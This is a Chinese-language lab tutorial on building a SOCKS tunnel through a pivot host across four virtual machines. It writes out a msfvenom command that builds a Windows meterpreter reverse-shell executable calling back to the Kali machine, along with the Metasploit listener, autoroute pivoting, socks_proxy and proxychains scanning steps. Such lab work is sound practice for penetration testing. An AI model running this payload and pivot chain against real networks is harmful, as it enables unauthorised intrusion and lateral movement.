一些前缀准备

1、需要四台虚拟机---win10(作为本地主机)、kali(作为vps)、win7(作为跳板)、win2012(作为目标机)

2、我们需要模拟内网主机，需要配置一下虚拟机网卡，让他不出网

编辑---->虚拟网络编辑器---->添加网络

DHCP设置

这里的范围随意

3、所有的主机都使用NAT模式

4、跳板机需要两张网卡(一张出网(NAT)、一张当内网(12.12.12.0网段的))
5、目标机使用小皮面板开个http服务

搭建隧道代理

win7是代理,访问kali自己的1080相当于让win7帮我们访问目标机的80端口

1. kali生成木马用于连接跳板机win7

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.250.129 LPORT=7777 -f exe > kali.exe

   

2. kali开启监听

   msfconsole
   set payload windows/meterpreter/reverse_tcp 
   set lhost eth0
   set lport 7777
   run

   

3. 上线木马

   将木马放到win7中运行

   

4. 配置win7的路由

   保证win7能通win2012

   run autoroute -p
   run autoroute -s 12.12.12.0/24
   run autoroute -p 
   bg
   route print

   

5. kali开启隧道

   use auxiliary/server/socks_proxy
   set version 4a
   run

   

   vim /etc/proxychains4.conf
   socks4 192.168.250.129 1080

   

6. kali访问目标机

   proxychains  nmap -sT 12.12.12.18 -p 80   或者
   proxychains firefox 12.12.12.18

如果浏览器访问不了，那能探测到80端口的开放就可以了

通过win10访问目标主机

1. 开启全局代理让所有流量指向kali机

   下载SocksCap(下载exe就好)

   https://github.com/bobo2334/sockscap64/releases

   安装时遇到这个选否

   

   运行exe
   
   

2. 本地使用burp抓包

抓包配置

完成